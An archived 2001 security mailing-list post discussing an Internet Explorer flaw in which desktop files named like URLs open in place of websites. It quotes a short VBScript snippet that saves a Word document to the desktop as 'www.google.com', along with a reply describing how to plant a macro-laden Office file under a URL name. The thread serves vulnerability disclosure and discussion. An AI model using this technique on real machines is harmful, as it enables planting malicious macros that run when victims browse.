Remember this?
I remember this as a L0pht (@stake) advisory from back in the day...
<SCRIPT LANGUAGE=VBScript>
Set WWObj = CreateObject("Word.Document")
WWObj.SaveAs("c:\windows\desktop\www.google.com")
</SCRIPT>
can it be used in any sort of fashion in this vulnerability???
On Mon, 13 Aug 2001 martin.goudreaultat_private wrote:
>
>
> Hi All,
>
> You can also do the same thing with files that are associated: *.doc (will open
> Word), *.xls (will open Excel), *.mdb (will open Access) and so on...
>
> Try this: Create a word document (or excel sheet) with an automacro, copy it to
> your desktop, rename it to whatever URL you want, open IE and type that
> address...voila... (worked here!)
>
> Harmful you say... Yeesh
>
> Just my two cents worth...
>
> Martin Goudreault
> Senior Systems Support
> Bombardier - AeroSpace
> St-Laurent, Qc, Canada
> (514) 855-5001 x55488
>
>
>
>
--
--- -sween
| M | http://www.modelm.org
--- "force feedback computing since 1984."
<meta name="MSSmartTagsPreventParsing" content="TRUE">
This archive was generated by hypermail 2b30 : Mon Aug 13 2001 - 18:24:17 PDT